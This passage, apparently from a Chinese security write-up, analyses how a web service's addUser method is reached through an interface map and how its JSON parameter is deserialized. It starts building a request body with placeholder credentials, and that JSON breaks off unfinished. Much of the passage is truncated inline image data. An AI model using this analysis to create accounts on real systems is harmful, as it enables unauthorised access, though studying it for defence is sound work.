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
|
|||
|
|
<p blockindex=15>假设我们想调用addUser这个方法需要指定<code>interfaceMethodsMap</code>的key为<code>admin_011_02</code>(下面会讲到),map会返回我们<code>WsMethod</code>对象,那么<code>WsMethod#getExtClass</code>返回的值就是map中的 <code>WsMethod.bulid</code> 的第⼆个参数,也就是<code>ExUserBean</code></p>
|
|||
|
|
<p blockindex=16><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=17><code>WsAdminParam.fromJson(jsonParam, method.getExtClass());</code>⽅法如下:这⾥将我们传⼊的第⼆个参数⾸先进⾏json解析,移除json中的param参数,然后再分别进⾏json反序列化,第⼀次反序列化是将移除的param json数据转化为<code>ExUserBean</code>类型,第⼆次反序列化是将 传⼊的json转化为 <code>WsAdminParam</code> 类型,最后将<code>ExUserBean</code>重新设置到 <code>WsAdminParam</code> 对象中,因此我们传⼊的参数主要是在反序列化为 <code>WsAdminParam</code> 对象</p>
|
|||
|
|
<p blockindex=18><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=19>观察 <code>WsAdminParam</code> 类成员变量,发现需要这些参数:</p>
|
|||
|
|
<p blockindex=20><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=21>那我们在<code>executeInterface</code>方法中传入的jsonParam的值应为:</p>
|
|||
|
|
<pre blockindex=22><code class="hljs language-json">{
|
|||
|
|
<span class=hljs-attr>"authorinize"</span>: {
|
|||
|
|
<span class=hljs-attr>"userName"</span>: <span class=hljs-string>"11"</span>,
|
|||
|
|
<span class=hljs-attr>"password"</span>: <span class=hljs-string>"11"</span>,
|
|||
|
|
<span class=hljs-attr>"loginCode"</span>: <span class=hljs-string>"11"</span>
|
|||
|
|
},
|
|||
|
|
<span class=hljs-attr>"locale"</span>: <span class=hljs-string>"1"</span>,
|
|||
|
|
